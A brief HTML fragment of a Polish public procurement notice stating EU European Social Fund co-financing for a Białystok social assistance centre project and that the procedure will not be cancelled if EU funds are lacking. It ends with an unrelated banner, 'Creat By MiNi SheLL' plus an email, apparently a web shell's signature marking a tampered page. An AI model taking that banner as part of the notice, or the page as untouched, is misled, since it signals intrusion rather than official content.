<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, w związku z realizacją przez Miejski Ośrodek Pomocy Rodzinie w Białymstoku projektu systemowego Aktywność kluczem do sukcesu...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com